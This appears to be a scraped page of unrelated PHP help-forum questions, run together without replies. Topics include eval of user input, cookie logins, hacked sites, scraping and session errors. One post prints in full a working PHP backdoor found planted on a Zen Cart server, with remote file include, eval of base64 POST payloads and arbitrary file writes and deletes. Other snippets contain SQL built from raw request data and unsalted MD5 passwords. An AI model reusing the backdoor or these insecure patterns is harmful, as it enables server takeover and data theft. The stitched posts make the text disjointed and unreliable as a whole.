PHP - Website Hacked...strange

I know the following line of code is dangerous since the user has control of $query but I do not know any other way to realistically do it.

  if (eval('return (' . $query . ');')) {

The perpose is to allow the user to type in any valid php statement and see if it evaluates true or false.

I.E. 
1==1  is true
substr('cat',1,2)=='at' is true
12<6 is false

the problem is I am sure there are ways a hacker could use this code to upload code to my site and take over.  I have 2 options.  1 filter out any possible way a hacker could hack it or 2 only allow the user to enter functions that can't be used to hack it.  I will probably go the later route but either way I need to know what to look for.

Please let me know if you can think of any values for $query that would let you hack my site

(p.s. this code is not up yet and will not go up until any possible security flaws are fixed.)

I am using php 5 and I am having issues with cookies. I have looked at the help pages here but still stuck. A site had been hacked via a database and I am making it more secure with the use of session control ip address and cookies. The issue is this I need to run a database query to test if the two cookies set match that with the data in the database. I am using the following code in the head section.
Code: [Select]
<?php
session_start();
$session = session_id();
$ip = $_SERVER['REMOTE_ADDR'];
$user = stripslashes(trim($_POST['user']));
$pass = stripslashes(trim($_POST['pass']));
$username="$user";
$encrypt_user=md5($username);
$password="$pass";
$encrypt_password=md5($password);
include 'config.php';
$query = "SELECT * FROM `users`WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'";
$result = mysql_query($query) or die (mysql_error());
if (mysql_num_rows($result)>0){
while($row = mysql_fetch_row($result)){
// set the cookies
setcookie("cookie[pas]", "$encrypt_password");
setcookie("cookie[user]", "$encrypt_user");
 $query = ("UPDATE`users`SET`sid`='$session', `ip` = '$ip'WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'");
$result = mysql_query($query) or die (mysql_error());
}
}
 else {
echo 'No rows found';
}
?>
This works fine now when I add this bit of code I can see the cookie name and value.
Code: [Select]
<?php
echo "$ip<br>";
if (isset($_COOKIE['cookie'])) {
    foreach ($_COOKIE['cookie'] as $name => $value) {
        $name = htmlspecialchars($name);
        $value = htmlspecialchars($value);
        echo "$name : $value <br />\n";
    }
}
?>
I can see the ip address and the two cookies named user and pass but when I try to get the individual cookie details nothing comes out and this is the issue as I need to test each of the two individual cookies against the info in the database so I can include pages to make it all secure. I have tried
Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$encrypt_user";
    }
?>encrypt_user being the username from the form. I have also tried

Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$_COOKIE['user']";
    }
?>
These are not showing. I do not need to see it just run a query to test that each cookie matches the encrypt data in the MySQL. Any ideas would be great if you can help and if not have a great weekend 

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):


<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Hey, friends.  I have some trouble on the server front.  My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit.  I'm looking for a way to search for any and all php files contained in multiple directories with specific names.  For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"?  I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep.  I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. 

Any and all help is appreciated.  Hackers suck.

I'm trying to make a League of Legends (a video game) community website, both as a personal project and for practice.
Now the game has a lot of champions, each of whom have 5 unique abilities. Now, I thought about manually inputting all the details about each champion into a MySQL database, but that would long and tedious, and I don't really have the time for it now. Also, the game patches very oftern (like, once every 2 weeks) which changes many of the stats, etc. of the champion, and it is not possible for me to keep manually updating these every time there is a patch.

Fortunately, there is a League of Legends Wiki which has all the data I need in their specific champion pages, which they keep updated per patch. So I was wondering if there was any way to get the data from the divs in the wiki, and have it display on my site. What I want to do in my website is that whenever someone types a champion's name (in a post or whatever), I want it to display a hover-over dialog with some of the champions details. And a lot of other features such as that.

In plain English I need a way to :
> Tell PHP to go to the wiki's source code on a specific page
> Find a specific div container
> Get X data from there
> Pass X data into a function to display the hover-over

I think this way, I would not have to maintain a database as I can leech off the wiki's data.
I have not coded anything like this before, so I would like a few pointers as to how to achieve this. Any help will be appreciated!

hello
My database is in a same server with seperate domain name , then I want to insert from website1 mysql data on website2 mysql data.
can anyone help me?

I tried searching on google but couldn't find any relevant information, please redirect me to relevant source or help me with the code.

I want to pass a domain name in text field which will be scanned and then the script will display entire site map.

Not external links or links on a page. Sorry it is not easy for me to explain.

Eg. if i pass abc.com

Script will display

abc.com/12/adn.php
abc.com/asd/asd/
etc

Whatever their url format is.

All the links on that domain.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<?php
session_start();
ini_set('display_errors', 'On');
error_reporting(-1);
//Connect to Database and Check cookies for logged in user
$db = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);
mysql_select_db(MYSQL_DB_NAME);
if (!isset($_GET['act'])) {
    if (!isset($_POST['act'])) {
        $act = 'idx';
    }
    if (isset($_POST['act'])) { 
        $act = mysql_real_escape_string($_POST['act']); 
    }
}
if (isset($_GET['act'])) { $act = mysql_real_escape_string($_GET['act']); }
If ($act == 'login' && $_GET['CODE']=='1') {
    $usernameUsed = mysql_real_escape_string($_POST['Username']);
    $passwordUsed = mysql_real_escape_string($_POST['Password']);
    $SaltPassword = MEMBER_PASS_SALT_1.$passwordUsed.MEMBER_PASS_SALT_2;
    $HashPassword = md5($SaltPassword);

    $QueryLogin = "SELECT * FROM ".MEMBER_LOGIN_TABLE." WHERE username='{$usernameUsed}' AND password='{$HashPassword}'";
    $LoginResult = mysql_query($QueryLogin);
    if (mysql_num_rows($LoginResult) > 0) {
        $UserID = mysql_result($LoginResult, 0, 'user_id');
        $Id = uniqid();
        $IdQry = "UPDATE ".MEMBER_LOGIN_TABLE." SET `unique_id`='{$Id}' WHERE user_id='{$UserID}'";
        $IdRes = mysql_query($IdQry, $db);
        setcookie('RAYTH_MEMBER_ID', $Id, time()+2592000);
    }
}
If ($act == 'logout' && $_GET['CODE'] == '1') { setcookie('RAYTH_MEMBER_ID', "", time()-3600); }

if (isset($_COOKIE['RAYTH_SKIN'])) { $Skin = $_COOKIE['RAYTH_SKIN']; } Else { $Skin = 'redskin'; }

if (isset($_COOKIE['RAYTH_MEMBER_ID'])) {
    $Id = mysql_real_escape_string($_COOKIE['RAYTH_MEMBER_ID']);
    $MemIdQry = "SELECT user_id FROM ".MEMBER_LOGIN_TABLE." WHERE `unique_id`='{$Id}'";
    $memidres = mysql_query($MemIdQry, $db);
    $memidnum = mysql_num_rows($memidres);
    If ($memidnum < 1) { setcookie('RAYTH_MEMBER_ID', '', time()-3600); }
    Else { $memid = intval(mysql_result($memidres, 0, 'user_id')); }
}

if (isset($memid)) {
    $query_meminfo = "SELECT * FROM ".MEMBER_PROFILE_TABLE." WHERE `user_id`='{$memid}'";
    $query_result = mysql_query($query_meminfo, $db);
    $MemName = mysql_result($query_result, 0, 'display_name');
    $MemGroup = mysql_result($query_result, 0, 'Group');
    $AdsEnabled = mysql_result($query_result, 0, 'ads_enabled');
    $UserLevel = intval(mysql_result($query_result, 0, 'user_level'));
    $LevelQuery = "SELECT group_level FROM ".MEMBER_GROUPS." WHERE group_id='{$MemGroup}'";
    $LevelResult = intval(mysql_result(mysql_query($LevelQuery, $db), 0, 'group_level'));
    If ($UserLevel < $LevelResult) { $MemLevel = $LevelResult; }
    Else { $MemLevel = $UserLevel; }
}
else {
    $MemLevel = 0;
    $AdsEnabled = 'yes';
}
?>
<html>
    <HEAD>
        <title>Rayth.Info ..::Home::..</title>
        <?php 
        $File = './skins/'.$Skin.'/'.$Skin.'.php';
        If (file_exists($File)) {
        include("./skins/{$Skin}/{$Skin}.php");
        }
        Else { include("../skins/{$Skin}/{$Skin}.php"); }
        ?>


Ok this code is the Headers code which checks if user is logged in, what skin to load etc.
It is also used in the forum (so used in home and forum) via php include.

Now somethin strange happens.
If I use the home page to login (Rayth.Info) it logs me in for both home page and forum (rayth.info/forum)

Now, if I then logout, and goto the forum, relogin, it doesn't log me in on the home page.
Both pages use the same login/logout/register forms by php include and the same headers.php by include so I cant see any reason why this is happening. The cookie is obviously being set when user logs in since it sees them logged in on one page.

HI every one

I have uploaded a web site 2 month ago and It worked well . Since 1 week ago , it shows me this error and I don't know what is the problem . I have completely uploaded my web site again but it hasn't make different . This is the address    birjand-niazmandi.com  . I have uploaded class.phpmailer.php again but I can't understand what is the problem ?

How can I solve it ?

thanks

Im installing and testing a web application, and im having a strange bug that annoyes me because it dint have any sense and also it dont affects really to the web functionality:



if($_POST["eliminar"]==""){

$consulta='SELECT * FROM impressora where Activa=0';

$result=mysql_query($consulta,$conexion);

echo"<table align=CENTER class='sample'>";

echo"<p align=center>LLISTA D'IMPRESSORES INACTIVES.</p>";

printf("<th>MODEL</th><th>MARCA </th>");

while($fila=mysql_fetch_array($result,MYSQL_ASSOC)){

echo"<tr>";

echo "<td>" . $fila["Model"] . "</td>";

echo "<td>" . $fila["Marca"] . "</td>";

echo"</td>";

if($_SESSION["admin"]!=0){ 
?>

<form method= "post" ACTION="impressores_inactives.php?idr=<?php echo($fila["Id_impressora"])?>">

<td colspan="2"><INPUT TYPE ="SUBMIT" NAME="eliminar" VALUE="Eliminar"></td>

</form></td>
<?php

}

echo "</tr>";

}

echo"</table>";

}else{

echo 'eliminado';
echo $_POST["eliminar"];

//BORRAMOS DE LA BBDD LA IMPRESSORA

$consulta="delete from impressora where Id_impressora='".$_GET["idr"] ."'";

$result=mysql_query($consulta);

echo "<meta http-equiv=Refresh content=\" ; url=../Impressores/impressores_inactives.php\">"; 
}

The problem is that php say that eliminar is undefinded, and if i test $_POST it says its empty. See that eliminar is the name of the submit post and its checked for a function that deletes a item.

The problem is that script is actually working. I can delete the printer  but with that error... and if i test the value of eliminar is always empty.

Ask for any other explanation without a problem , the code is in spanish.

So I have a client that wants me to add a function to her site that when she clicks a mailto href on a page to spawn an email child, some canned data chunk gets inserted into a form's textarea field.. something like:  "Email sent to blah@blah.com on 8/14/14".      I'm drawing a blank on how this might be handled.. any ideas out there??

Ok, not sure what the problem is....hard to explain.   I am trying to setup a login script but I get the normal: Warning: session_start() [function.session-start]: Cannot send session cache limiter error code.  I have no white space above to cause problem.  I have used this same code written by Jpmaster77 on a number of sites.  What the strange thing is it also messed up a couple of my css text boxes.   

See the difference: 
http://www.monstersgonewild.ca/index.php - Problem
http://www.monstersgonewild.ca/index1.php - Without session()

I would post the code of the original page but it is 600+lines and growing.

Anybody have any ideas?

So i am currently coding database connection class and i have encountered very strange behavior from my script.

base.class.php:
Code: [Select]

<?php

class base{
   
    private $settings;
 

    function get_settings(){
       
        $settings["dbhost"] = 'localhost';
        $settings["dbuser"] = '*****';
        $settings["dbpass"] = '*****';
        $settings["dbname"] = 'core';
        return $settings;
      
        }
    }


?>


database.class.php
Code: [Select]

<?php

require_once 'base.class.php';





class database extends base{
    
    
    private $query_now;
    private $link;
    
   
    public function __construct(){
       
        $settings = base::get_settings();
        

      
        $dbhost = $settings["dbhost"];
        $dbuser = $settings["dbuser"];
        $dbpass = $settings["dbpass"];
        $dbname = $settings["dbname"];
              
        
        
        $this->link = mysql_connect($dbhost, $dbname, $dbpass) or die ("Could not connect to the mysql database");
        mysql_select_db($dbname, $this->link) or die ("Could not select the database"); 
        
        }
        
        
        
   
        function query($query){
            
            $this->query_now = $query;
            return mysql_query($query, $this->link);
        
            }
        
      
        function getArray($result){
            
            return mysql_fetch_array($result);
            
            
            }
  
    
    }

    
    



?>
When i try to create an instance of database class, i get mysql_connect error. I have tried to echo my array and it seems that correct information is being passed over. Now the strange thing is if i remove my password from the base class i don't get a mysql_connect error but this time instead i get "Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'core'@'localhost' (using password: YES) " In case you are wondering, does my mysql database user has a password, the answer is: yes for sure... (Also i have tried to setup a simple script for connecting to my database and everything worked fine) So any ideas?

I'm returning a table row that contains information about a file, but it seems in IE versions older than 10, it is cutting off some of the returned json when being used.   The data is being returned properly as seen in the following json:

{"file_name":"<i class='video'><\/i> <a href=\"\/Development\/test(4).mp4\" class=\"is_file\" target=\"_blank\">test(4).mp4<\/a>"}

But when you use it, it cuts off the html.  A simple alert will return

</i> test(4).mp4</a>

and same when appending it and the sort.  It is also happening for another part of HTML that is being returned properly in the json.  It is working for everything else that is returned.   I have been searching around for a very long time trying to find why this is happening.  Has anyone other than me encountered this?